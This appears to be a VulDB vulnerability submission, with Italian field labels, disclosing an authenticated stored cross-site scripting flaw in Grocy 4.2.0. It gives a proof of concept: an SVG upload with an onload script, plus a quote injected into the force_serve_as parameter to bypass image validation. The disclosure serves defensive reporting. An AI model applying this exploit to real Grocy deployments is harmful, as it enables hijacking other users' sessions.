| Titolo | Grocy 4.2.0 Authenticated Stored Cross-Site Scripting via Break of Control |
|---|
| Descrizione | When authenticated, an operator can bypass the image validation mechanisms and successfully upload a stored Cross-Site Scripting (XSS) payload within the application. This vulnerability allows the operator to steal other users' sessions by tricking them into clicking the stored link.
PoC>
1. Access the "Recipes" menu;
2. Add a new recipe by clicking on "Add" and fill in the inputs with any values;
3. After adding, an "Edit recipe" page will open. On this page, under the "Picture" section, upload a file containing the following content:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg onload="alert(1)" xmlns="http://www.w3.org/2000/svg">
<defs><font id="x"><font-face font-family="y"/></font></defs>
</svg>
4. When you review the Burp history, you will find a request like this after uploading the SVG file:
GET /api/files/recipepictures/(base64...)?force_serve_as=picture&best_fit_width=400
The response to this request is an error indicating that the image is not valid:
404 Not Found - {"error_message":"Unsupported image type"}
5. Manipulate the "force_serve_as=picture" parameter to: "force_serve_as=picture' ". The single quote breaks the parameter, allowing you to bypass the validation.
6. By copying the URL> http://localhost:9283/api/files/recipepictures/(base64)?force_serve_as=picture'&best_fit_width=400, you can successfully trigger the stored Cross-Site Scripting (XSS) attack.
|
|---|
| Fonte | ⚠️ https://github.com/grocy/grocy |
|---|
| Utente | Stux (UID 40142) |
|---|
| Sottomissione | 31/08/2024 20:26 (2 anni fa) |
|---|
| Moderazione | 01/09/2024 15:42 (19 hours later) |
|---|
| Stato | Accettato |
|---|
| Voce VulDB | 276274 [Grocy fino a 4.2.0 SVG File Upload recipepictures force_serve_as cross site scripting] |
|---|
| Punti | 20 |
|---|